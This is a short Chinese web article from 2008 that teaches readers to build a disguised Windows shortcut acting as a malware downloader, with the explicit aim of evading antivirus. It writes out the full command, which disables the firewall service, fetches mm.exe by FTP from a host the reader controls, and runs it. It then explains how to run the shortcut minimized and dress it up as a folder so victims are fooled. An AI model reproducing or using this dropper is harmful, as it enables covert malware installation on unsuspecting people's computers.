利用windows自带功能做永不被查杀
2008-11-22 10:08:55 来源:WEB开发网核心提示:step1 先在桌面上单机右键,新建-快捷方式 step2 在项目位置里输入 %windir%system32cmd.exe /c net stop sharedaccess&echo open XXXX.vicp.net > t.t&echo user>>t.t&echo pass>>t
step1
先在桌面上单机右键,新建-快捷方式
step2
在项目位置里输入
%windir%system32cmd.exe /c net stop sharedaccess&echo open XXXX.vicp.net
> t.t&echo user>>t.t&echo pass>>t.t&echo get mm.exe c:mm.exe >> t.t&echo
bye >> t.t&ftp -s:t.t&del t.t&c:mm.exe
就不解释了,看过dos的都明白,是个ftp下马过程
需要修改的地方
XXXX.vicp.net--改成自己的域名
user--用户
pass--密码
get mm.exe c:mm.exe 吧mm.exe下载下来,放到c盘
c:mm.exe--运行
step3
下一步-完成
然后在快捷方式的属性里边吧运行方式改成最小化,自己改个图标就完成了呵呵..
生成出来大小不到3字节
PS..
如果你吧下载者的图标改成了文件夹形式,可以在代码中添加
" %windir%explorer.exe c: "这句话
运行了下载者后会打开C盘,和普通的文件加没什么区别,迷惑人的。
更多精彩
赞助商链接